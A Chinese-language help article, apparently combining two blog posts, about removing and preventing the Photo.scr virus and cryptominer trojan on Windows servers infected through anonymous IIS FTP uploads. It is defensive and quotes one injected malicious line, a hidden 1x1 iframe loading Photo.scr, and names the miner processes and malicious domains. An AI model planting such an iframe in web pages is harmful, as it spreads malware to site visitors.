Photo.scr病毒怎么清除和防范?
有段时间笔者的win2003服务器上出现大量Photo.scr病毒,庆幸的是检查任务管理器后并没有发现可疑进程,说明病毒没有被执行。
删除后没清静多少时间,这些病毒又冒出来了。
这些Photo.scr的路径都在IIS自带FTP的路径下,关闭FTP服务就不再出现了,只要一开FTP过段时间又会出现。
然后就认为黑客是利用了IIS自带的FTP漏洞上传的病毒文件,只要不用FTP时就关掉FTP服务。
刚刚发现原来是开了FTP的匿名连接导致的,只要取消“允许匿名连接”的勾就解决了。
这段时间笔者在给网站搬家时,发现Defender对网站文件进行报毒,查看后是被加入了以下恶意代码,以达到病毒传播的目的。
<iframe src=Photo.scr width=1 height=1 frameborder=0></iframe>
黑客并没有批量添加代码,只改了2个文件,而且不仅限是html文件,还有xml文件也没幸免,应该是黑客觉得批量添加容易被发现,所以手动添加。
清除Photo.scr病毒:
1、如果没有运行它,直接搜索Photo.scr并删除就可以了,如果已经运行过,建议杀毒或重装系统。
2、检查下文件有没有被添加恶意代码,虽然已经删除Photo.scr不会再传播,但是安全软件还是会报毒提示,如果被添加恶意代码删除即可。
安全防范建议:
1、虽然知道了是开了FTP的匿名连接导致病毒上传,不过还是建议不用FTP的时候还是关闭它,谁知道它还会有其它的什么漏洞呢。
2、建议FTP的目录不要直接设在网站目录,如需上传文件到网站目录,可以先上传到别处再通过复制或剪切到网站目录。
3、更改FTP默认端口,避免被黑客的端口扫描器扫到。
=======================================================================
当服务器上出现这些文件:photo.scr时,说明你的服务器已经感染了矿机木马。
第一次发现这个木马的时候是在上班, 突然发现公司的云服务器上有这个可疑的文件, 它是这样的图标(右边是正常的文件夹):
只是一个简单的矿机木马, 技术含量不高, 中了招的朋友可以通过以下步骤删除木马:
打开任务管理器, 结束 NsCPUCNMiner32.exe | NsCPUCNMiner64.exe | photo.scr 这三个进程. 64的那个不一定有.
删除所有磁盘根目录下的 photo.scr 文件.
删除 %Temp% 文件夹下的 pools.txt | NsCPUCNMiner32.exe | NsCPUCNMiner64.exe 这三个文件, 64的那个不一定有.
(此项步骤可选, 用于防止再次中招) 将 stafftest.ru | www.stafftest.ru | u.lduxnfz.com 这三个地址用hosts屏蔽为127.0.0.1
(此项步骤可选, 用于防止再次中招) 将 NsCPUCNMiner32.exe | NsCPUCNMiner64.exe | photo.scr 这三个进程用iHtool工具加入IFEO映像劫持.
(此项步骤可选, 用于防止再次中招) 如果你的电脑正在运行 ftp server, 设置一个密码或者用ssl加密(更改端口也可).
最后要说下的是win系统自带的FTP能不安装就别安装它,数据上传方式有很多种方法,比如上传到网盘里在服务器上下载,或者安装一个其他的FTP软件。